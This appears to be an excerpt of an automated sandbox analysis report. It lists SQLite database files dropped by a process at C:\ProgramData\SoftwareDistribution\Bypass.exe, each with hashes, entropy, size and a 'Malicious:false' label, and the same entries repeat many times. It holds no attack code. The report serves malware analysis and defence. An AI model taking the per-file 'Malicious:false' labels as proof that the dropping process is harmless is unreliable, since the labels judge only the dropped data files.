                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                        Malicious:false
                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5712781801655107
                        Encrypted:false
                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:05A60B4620923FD5D53B9204391452AF
                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5707520969659783
                        Encrypted:false
                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                        Malicious:false
                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                        Category:dropped
                        Size (bytes):28672
                        Entropy (8bit):2.5793180405395284
                        Encrypted:false
                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5712781801655107
                        Encrypted:false
                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:05A60B4620923FD5D53B9204391452AF
                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):49152
                        Entropy (8bit):0.8180424350137764
                        Encrypted:false
                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                        MD5:349E6EB110E34A08924D92F6B334801D
                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):49152
                        Entropy (8bit):0.8180424350137764
                        Encrypted:false
                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                        MD5:349E6EB110E34A08924D92F6B334801D
                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5712781801655107
                        Encrypted:false
                        SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:05A60B4620923FD5D53B9204391452AF
                        SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                        SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                        SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):20480
                        Entropy (8bit):0.5707520969659783
                        Encrypted:false
                        SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                        MD5:9F6D153D934BCC50E8BC57E7014B201A
                        SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                        SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                        SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                        Malicious:false
                        Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):40960
                        Entropy (8bit):0.8553638852307782
                        Encrypted:false
                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                        MD5:28222628A3465C5F0D4B28F70F97F482
                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                        Category:dropped
                        Size (bytes):106496
                        Entropy (8bit):1.1358696453229276
                        Encrypted:false
                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                        MD5:28591AA4E12D1C4FC761BE7C0A468622
                        SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                        SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                        SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                        Malicious:false
                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                        Category:dropped
                        Size (bytes):49152
                        Entropy (8bit):0.8180424350137764
                        Encrypted:false
                        SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                        MD5:349E6EB110E34A08924D92F6B334801D
                        SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                        SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                        SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                        Malicious:false
                        Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                        Category:dropped
                        Size (bytes):114688
                        Entropy (8bit):0.9746603542602881
                        Encrypted:false
                        SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                        MD5:780853CDDEAEE8DE70F28A4B255A600B
                        SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                        SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                        SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                        Malicious:false
                        Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        Process:C:\ProgramData\SoftwareDistribution\Bypass.exe
                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                        Category:dropped
                        Size (bytes):28672
                        Entropy (8bit):2.5793180405395284
                        Encrypted:false
                        SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                        MD5:41EA9A4112F057AE6BA17E2838AEAC26
                        SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                        SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                        SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                        Malicious:false
